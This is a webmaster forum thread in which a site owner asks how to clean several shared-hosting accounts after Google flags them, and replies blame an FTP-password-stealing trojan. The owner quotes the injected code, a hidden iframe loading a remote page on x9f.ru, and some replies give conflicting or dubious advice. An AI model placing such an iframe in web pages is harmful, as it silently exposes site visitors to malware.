Virus caused google flagging need advice
 

ok
I have Multiple sites on multiple shared hosting. several domains flagged with the virus warning on google, so i found the iframe virus thing and deleted from the page and google recheck removed the warning, well today i see warnings on more of my listings on google different domains on different shared hosting companies. I think it came from my computer when i ftp but now that i have cleaned my computer i am worried all the servers are infected also so how do i clean all my different shared hosting accounts at 6 different places webair,phatservers,bluegravity,namecheap.occhostin g before i ftp clean pages back into them

Yeah, you are probably the cause.

1. Virus scan your pc
2. change all your passwords (make it a difficult pass, don't use words)
3. Ask your host to check, otherwise, you will have to do it yourself, but they should help.

that hurts!

how do i clean the hosting accounts if i dont trust they will do it?

this is somehow on my pages i have no idea what or how it got there

<iframe src="http://x9f.ru:8080/index.php" width=112 height=176 style="visibility: hidden"></iframe>

bump bump

pwnt :winkwink:

I had this shit on one of my PCs, it's called 'iframer heur' . even if you have a firewall the virus spreads.
if you're using cuteftp or filezilla it steals your ftp passwords and puts those iframes on every page that has 'index' in the filename (it makes it recursively, on all folders)

right now the only antivirus that detects it is Kasperksy but there's no antivirus that cures an infected computer.

the solution is to reinstall windows... or better: buy a mac :)

1) Using an exploitable script (upgrade if you can)
2) Leaving your .htaccess open
3) As baddog mentioned scan your PC and host end, there are viruses which attack clients like Filezilla and use the exploit to grab access.

I have another laptop not infected , but how can i be sure this virus is not on the server someplace do i need all 6 new hosting company also

even if i use my other computer its just waiting for me inside my hosting acct at webair, occhosting,bluegravity, and 3 othe hosts i use

once you get in from the other computer clean the files and change the password.
if you really have to ftp from the infected computer use another ftp program that doesn't send passwords to the virus, like FireFTP (it's a firefox extension)

i love listening to people that loves to preach... people that have no idea about how search engines nor simple webmaster things actually work... :upsidedow

1. tell your host. They need to remove the infected machine from service and replace it with one that hasn't been compromised and is up to date with security fixes.

2. examine any server side scripts you have to security vulnerabilities If you are using third party scripts - make sure you are using the most recent version and that there are no reported vulnerabilities. In case your scripts are not infected, it's probably DNS poisoning or DNS hack.

3. Use the google webmaster tools. You can notify them to rescan pages.

oh, and i forgot to tell ya: you don't have to rescan your pc, because YOU ARE NOT INFECTED! :2 cents:

nettrust: STFU newb !

did you fucking read this line : "all the servers are infected also so how do i clean all my different shared hosting accounts at 6 different places webair,phatservers,bluegravity,namecheap.occhostin g before i ftp clean pages back into them" ???

he has a trojan that sniffs his ftp passwords.